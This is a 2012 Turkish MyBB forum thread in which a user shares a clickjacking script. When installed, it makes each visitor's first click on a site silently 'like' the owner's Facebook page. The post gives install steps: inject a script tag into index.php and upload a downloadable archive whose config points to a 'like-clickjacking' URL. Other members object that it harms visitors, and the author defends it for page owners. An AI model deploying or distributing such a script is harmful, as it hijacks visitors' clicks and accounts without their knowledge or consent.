MyBBDepo - Türkiyenin MyBB Deposu Forumuna Hoşgeldiniz
Eğer sitemize yaptığınız ilk ziyaretiniz ise, lütfen öncelikle Forum Kurallarını okuyunuz. Forumumuzda bilgi alışverişinde bulunabilmeniz için Kayıt olmalısınız. Üye olmayanlar forumumuzdan yararlanamazlar.
Eğer zaten kayıtlı kullanıcı iseniz, lütfen kullanıcı adınız ve şifreniz ile, Giriş yapınız. (Sitemize üyelik ücretsizdir).
SvMedeT avatar
Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5

Derecelendirme: 0/5 - 0 oy

İlk tıklamada Facebook sayfa begendirme


Sponsor Reklam
media venus

Çevrimdışı SvMedeT
 Tarih: 25-12-2012, Saat:09:51
#1
Merhaba, sitemde bir arkadaş bunun smf de oldugunu ve MyBB'de nasıl kullanacağımızı sordu. Bende MyBB'ye uyarladım ve sorunsuz çalışıyor.

Ne işer yarar

Sitenize girin herhangi biri ilk yaptıgı tıklamada otomatik facebook sayfanızı begenir.

Kurulum:

Notepad++ Programı ile FTP ana dizinde bulunan index.php dosyasını açıyoruz ve en sonuna aşağıdaki kodu ekleyip kaydediyoruz. Not: Koddaki siteadı yazan yere kendi site adresinizi yazacaksınız..!
Kod:
<script src="http://siteadı.com/svbegen.js"></script>

Daha sonra aşağıdaki dosyayı indirip FTP ana dizine atıyoruz.


.rar   otobegen.rar (Dosya Boyutu: 767 Bayt / İndirme Sayısı: 81)
Not: Dosya içinde 9. satırda bulunan aşağıdaki sayfa adresini kendi facebook sayfa adresiniz ile değiştiriniz.
Kod:
http://erickerr.com/like-clickjacking

Hayırlı ve bol tıklatmalar Süper
Cevapla
Bunu Beğenenler:
Sponsor Reklam
sponsor reklam sponsor reklam

Çevrimdışı LegansTR2
 Tarih: 25-12-2012, Saat:13:50
(Son Düzenleme: 25-12-2012, Saat:13:53, Düzenleyen: LegansTR2.)
#2
teşekkürler bunu serkan hocam da bi ara paylaşmıştı diye hatırlıyorum mctr de

hocam beğendikten sonra beğen butonunu kaldıramazmıyız
Cevapla
Bunu Beğenenler:

İzinli Mısırga
 Tarih: 25-12-2012, Saat:13:57
#3
bence hiç güzel bişey değil
Cevapla
Bunu Beğenenler:

Çevrimdışı SvMedeT
 Tarih: 25-12-2012, Saat:13:58
(Son Düzenleme: 25-12-2012, Saat:13:59, Düzenleyen: SvMedeT.)
#4
Hocam kendisi kalkıyor diye biliyorum fazka denemedim ama. Ben bir defa tıkladım kaktı bende. Göz kırpma

(25-12-2012, Saat:13:57)Mısırga Adlı Kullanıcıdan Alıntı: bence hiç güzel bişey değil

Hocam bazı arkadaşlar facebook sayfalarını kasmak iştiyor onlar için iyi birşey Süper
Cevapla
Bunu Beğenenler:

İzinli Mısırga
 Tarih: 25-12-2012, Saat:14:00
#5
ziyaretçiler için iyi değil :p
Cevapla
Bunu Beğenenler:

Çevrimdışı SvMedeT
 Tarih: 25-12-2012, Saat:14:01
#6
(25-12-2012, Saat:14:00)Mısırga Adlı Kullanıcıdan Alıntı: ziyaretçiler için iyi değil :p

Hmm Evet, burada haklısınız ama sayfa sahibi için iyi. Uyku
Cevapla
Bunu Beğenenler:

İzinli Mısırga
 Tarih: 25-12-2012, Saat:14:12
#7
böyle şeyler yüzünden facebook'u açık bırakmaya korkuyor insan :p
Cevapla
Bunu Beğenenler:

Çevrimdışı SvMedeT
 Tarih: 25-12-2012, Saat:14:16
#8
Ben face fazla kullnamam hocam skype felan Açık Ağızlı Gülümseme benim için sorun olmaz siz bırakmayın. Göz kırpma
Cevapla
Bunu Beğenenler:

 


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Facebook Durum MehmetMsM 2 898 15-05-2013, Saat:22:37
Son Yorum: Screwy
  Mybb özel sayfa oluşturma ahmettben 4 1,362 12-05-2013, Saat:20:29
Son Yorum: ahmettben
  [MCTR - 1.6] Facebook Stili Profil eklentisi Musdi 5 1,358 07-10-2012, Saat:10:03
Son Yorum: ßyßurak
  Sayfa XFrqnX 1 571 09-09-2012, Saat:22:09
Son Yorum: EnesAteSs



Konuyu Okuyanlar: 1 Ziyaretçi